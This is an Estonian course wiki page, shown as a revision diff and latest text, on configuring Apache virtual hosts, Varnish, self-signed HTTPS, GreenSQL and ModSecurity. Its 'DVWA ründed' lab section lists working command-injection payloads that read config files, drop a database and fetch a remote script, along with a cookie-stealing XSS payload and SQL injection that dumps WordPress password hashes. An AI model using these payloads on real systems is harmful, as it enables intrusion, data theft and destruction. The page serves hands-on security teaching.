Virtualhost apache2 näitel: Difference between revisions
(28 intermediate revisions by 3 users not shown) | |||
Line 1: | Line 1: | ||
[[Category:IT infrastruktuuri teenused]] | |||
=Apache seadistamine= | |||
<pre> | <pre> | ||
/etc/hosts | /etc/hosts | ||
Line 23: | Line 26: | ||
mkdir -p /var/www/sales.planet.zz | mkdir -p /var/www/sales.planet.zz | ||
cp /var/www/index.html /var/www/www.planet.zz | cp /var/www/index.html /var/www/www.planet.zz | ||
cat >> /etc/network/interfaces <<EOL | |||
auto eth1:0 | |||
iface eth1:0 inet static | |||
address 192.168.56.201 | |||
netmask 255.255.255.0 | |||
EOL | |||
ifup eth1:0 | |||
cp /var/www/index.html /var/www/sales.planet.zz | cp /var/www/index.html /var/www/sales.planet.zz | ||
vim /var/www/www.planet.zz/index.html | vim /var/www/www.planet.zz/index.html | ||
Line 38: | Line 53: | ||
</source> | </source> | ||
=WordPress tuning= | |||
<source lang="apache"> | |||
<VirtualHost *:80> | |||
ServerAdmin webmaster@localhost | |||
ServerName wp.planet.zz | |||
DocumentRoot /var/www/wordpress | |||
<Directory /> | |||
Options FollowSymLinks | |||
AllowOverride None | |||
</Directory> | |||
<Directory /var/www/wordpress> | |||
Options Indexes FollowSymLinks MultiViews | |||
AllowOverride All | |||
Order allow,deny | |||
allow from all | |||
</Directory> | |||
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ | |||
<Directory "/usr/lib/cgi-bin"> | |||
AllowOverride None | |||
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch | |||
Order allow,deny | |||
Allow from all | |||
</Directory> | |||
ErrorLog ${APACHE_LOG_DIR}/error.log | |||
# Possible values include: debug, info, notice, warn, error, crit, | |||
# alert, emerg. | |||
LogLevel warn | |||
CustomLog ${APACHE_LOG_DIR}/access.log combined | |||
Alias /doc/ "/usr/share/doc/" | |||
<Directory "/usr/share/doc/"> | |||
Options Indexes MultiViews FollowSymLinks | |||
AllowOverride None | |||
Order deny,allow | |||
Deny from all | |||
Allow from 127.0.0.0/255.0.0.0 ::1/128 | |||
</Directory> | |||
</VirtualHost> | |||
</source> | |||
Pange tähele muudetud Directory seadeid. | |||
<Directory /var/www/wordpress> | |||
AllowOverride All | |||
<source lang="bash"> | |||
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj | |||
a2enmod rewrite | |||
a2enmod headers | |||
a2enmod expires | |||
</source> | |||
Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local'' | |||
Paigaldage oma valitud cace plugin wordpressile. | |||
=Varnish= | =Varnish= | ||
Line 53: | Line 134: | ||
sed 's/:80/:8080/' sales.planet.zz -i | sed 's/:80/:8080/' sales.planet.zz -i | ||
sed 's/:80/:8080/' www.planet.zz -i | sed 's/:80/:8080/' www.planet.zz -i | ||
#testimiseks | |||
grep ':80' * | |||
service apache2 restart | service apache2 restart | ||
#testimiseks | |||
netstat -lntp | netstat -lntp | ||
#installeerime varnish cache | |||
apt-get install varnish | apt-get install varnish | ||
vim /etc/default/varnish | vim /etc/default/varnish | ||
Line 119: | Line 209: | ||
Tee apache2 teenusele restart | Tee apache2 teenusele restart | ||
<source lang="bash"> | <source lang="bash"> | ||
service apache2 restart | |||
</source> | </source> | ||
Line 153: | Line 243: | ||
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req | openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req | ||
<pre> | |||
You are about to be asked to enter information that will be incorporated | |||
into your certificate request. | |||
What you are about to enter is what is called a Distinguished Name or a DN. | |||
There are quite a few fields but you can leave some blank | |||
For some fields there will be a default value, | |||
If you enter '.', the field will be left blank. | |||
----- | |||
Country Name (2 letter code) [AU]:EE | |||
State or Province Name (full name) [Some-State]:Harjumaa | |||
Locality Name (eg, city) []:Tallinn | |||
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet | |||
Organizational Unit Name (eg, section) []: | |||
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz | |||
Email Address []: | |||
Please enter the following 'extra' attributes | |||
to be sent with your certificate request | |||
A challenge password []: | |||
An optional company name []: | |||
</pre> | |||
sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem | sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem | ||
Line 213: | Line 325: | ||
</source> | </source> | ||
kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli): | |||
<source lang="bash"> | |||
8.8.8.8;mysqladmin DROP dvwa -y; | |||
</source> | |||
kuvada failide infot: | |||
<source lang="bash"> | |||
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz | |||
</source> | |||
skripti laadimine serverisse ning sellele käivitusbiti andmine: | |||
<source lang="bash"> | |||
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh | |||
</source> | |||
Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...) | Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...) | ||
Line 265: | Line 391: | ||
ln -s /usr/share/greensql-fw/ greensql | ln -s /usr/share/greensql-fw/ greensql | ||
greensql | cd greensql | ||
chmod 0777 templates_c | chmod 0777 templates_c | ||
</source> | </source> | ||
Kasutajanimi veebiliidesel on admin ja parool pwd. | Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''. | ||
Line 275: | Line 401: | ||
<pre> | <pre> | ||
$_DVWA[ 'db_server' ] = '127.0.0.1:3305' | $_DVWA[ 'db_server' ] = '127.0.0.1:3305'; | ||
</pre> | </pre> | ||
<source lang="bash"> | |||
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida | |||
service greensql-fw start | |||
</source> | |||
=modsecurity= | |||
==installeerimine== | |||
<source lang="bash"> | |||
apt-get install libapache2-mod-security2 | |||
</source> | |||
Muutke faili '''/etc/apache2/mods-available/security2.conf''' | |||
<source lang="apache"> | |||
<IfModule security2_module> | |||
# Default Debian dir for modsecurity's persistent data | |||
SecDataDir /var/cache/modsecurity | |||
# Include all the *.conf files in /etc/modsecurity. | |||
# Keeping your local configuration in that directory | |||
# will allow for an easy upgrade of THIS file and | |||
# make your life easier | |||
IncludeOptional /etc/modsecurity/*.conf | |||
IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf | |||
IncludeOptional /usr/share/modsecurity-crs/activated_rules/*.conf | |||
SecRuleEngine On | |||
</IfModule> | |||
</source> | |||
Teeme nimelingi modsecurity reeglite seadistamiseks: | |||
<source lang="bash"> | |||
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/ | |||
</source> | |||
=Apache2 tweaks= | |||
<source lang="apache"> | |||
ServerSignature Off | |||
ServerTokens Prod | |||
</source> | |||
http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3 | |||
== Apache testimine == | |||
Lisaks ab'le on olemas ka teisi utiliite: | |||
1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi <br> | |||
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php <br> | |||
3. OpenWebLoad - http://openwebload.sourceforge.net/#download <br> | |||
4. Allmon - https://code.google.com/p/allmon/downloads/list <br> | |||
5. CLIF - http://clif.ow2.org/download/index.html <br> | |||
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ <br> | |||
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ <br> | |||
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ <br> | |||
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ <br> | |||
10. http_load - http://www.acme.com/software/http_load/ <br> |
Latest revision as of 12:19, 4 May 2015
Apache seadistamine
/etc/hosts 192.168.56.101 www.planet.zz 192.168.56.101 sales.planet.zz
ping www.planet.zz
ping sales.planet.zz
apt-get update
apt-get dist-upgrade
apt-get install apache2
mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
address 192.168.56.201
netmask 255.255.255.0
EOL
ifup eth1:0
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz
vim www.planet.zz
vim sales.planet.zz
a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload
WordPress tuning
<VirtualHost *:80>
ServerAdmin webmaster@localhost
ServerName wp.planet.zz
DocumentRoot /var/www/wordpress
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/wordpress>
Options Indexes FollowSymLinks MultiViews
AllowOverride All
Order allow,deny
allow from all
</Directory>
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
<Directory "/usr/lib/cgi-bin">
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog ${APACHE_LOG_DIR}/access.log combined
Alias /doc/ "/usr/share/doc/"
<Directory "/usr/share/doc/">
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
</Directory>
</VirtualHost>
Pange tähele muudetud Directory seadeid. <Directory /var/www/wordpress> AllowOverride All
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires
Selle rea võib lisada alglaadimisel käivitatavasse faili /etc/rc.local
Paigaldage oma valitud cace plugin wordpressile.
Varnish
Esmaselt tõstame apache2 porti 8080
/etc/apache2/ports.conf NameVirtualHost *:8080 Listen 8080
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
#testimiseks
grep ':80' *
service apache2 restart
#testimiseks
netstat -lntp
#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
DAEMON_OPTS="-a :80 \ -T localhost:6082 \ -f /etc/varnish/default.vcl \ -S /etc/varnish/secret \ -s malloc,256m"
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
sub vcl_recv { # Add a unique header containing the client address remove req.http.X-Forwarded-For; set req.http.X-Forwarded-For = client.ip; # [...] }
service varnish restart
Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:
cd /etc/apache2/sites-available/
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.
nano wp
Sinna tuleb kirjutada CustomLog'i rea asemele
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta
cd /etc/apache2/conf.d/
Tee sinna uus fail nimega näiteks varnishlog.conf
nano varnishlog.conf
Kirjuta sinna see rida
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
Tee apache2 teenusele restart
service apache2 restart
DVWA ründed
HTTPS konfigureerimine
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /etc/ssl/private/www.planet.zz.key. Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub. The key fingerprint is: 76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server The key's randomart image is: +--[ RSA 2048]----+ | . | | + . | | o + | | * o | | S + O | | ..+ + + . | | ...o o = | | o+ o . | | .o. E | +-----------------+
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req
You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:EE State or Province Name (full name) [Some-State]:Harjumaa Locality Name (eg, city) []:Tallinn Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz Email Address []: Please enter the following 'extra' attributes to be sent with your certificate request A challenge password []: An optional company name []:
sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem
Signature ok subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz Getting Private key
cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl
Seal muuta sisu (sert, dokument root, keyfail)
Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile
ServerName www.planet.zz DocumentRoot /var/www/www.planet.zz SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
a2enmod ssl
a2ensite www.planet.zz-ssl
service apache2 restart
ID kaart
ID kaardiga autentimine Apache2 veebiserveriga
DVWA ründed
cmd exec
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
Loon faili kala /var/tmp kataloogi
8.8.8.8; touch /var/tmp/kala.txt
Ning kontrollin kas fail loodi
8.8.8.8; ls /var/tmp/
kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
8.8.8.8;mysqladmin DROP dvwa -y;
kuvada failide infot:
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
skripti laadimine serverisse ning sellele käivitusbiti andmine:
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
; grep session.cookie_httponly /etc/php5/apache2/php.ini
Väljund:
- kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:
session.cookie_httponly = 1
- kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))
session.cookie_httponly = 0
XSS
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
veel XSSi
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
SQLi
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --
2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --
3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --
4' union select user_login,user_pass from wp.wp_users; #
3' union select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
GreenSQL firewall
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb
dpkg -i greensql-fw_1.3.0_amd64.deb
apt-get install -f
#Modify existing virtualhost or create new virtualhost.
cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql
cd greensql
chmod 0777 templates_c
Kasutajanimi veebiliidesel on admin ja parool pwd.
Muutke DVWA config failis andmebaasi asukohta:
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
modsecurity
installeerimine
apt-get install libapache2-mod-security2
Muutke faili /etc/apache2/mods-available/security2.conf
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity
# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf
IncludeOptional /usr/share/modsecurity-crs/activated_rules/*.conf
SecRuleEngine On
</IfModule>
Teeme nimelingi modsecurity reeglite seadistamiseks:
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/
Apache2 tweaks
ServerSignature Off
ServerTokens Prod
http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3
Apache testimine
Lisaks ab'le on olemas ka teisi utiliite:
1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php
3. OpenWebLoad - http://openwebload.sourceforge.net/#download
4. Allmon - https://code.google.com/p/allmon/downloads/list
5. CLIF - http://clif.ow2.org/download/index.html
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/
9. FWPTT - http://sourceforge.net/projects/fwptt/files/
10. http_load - http://www.acme.com/software/http_load/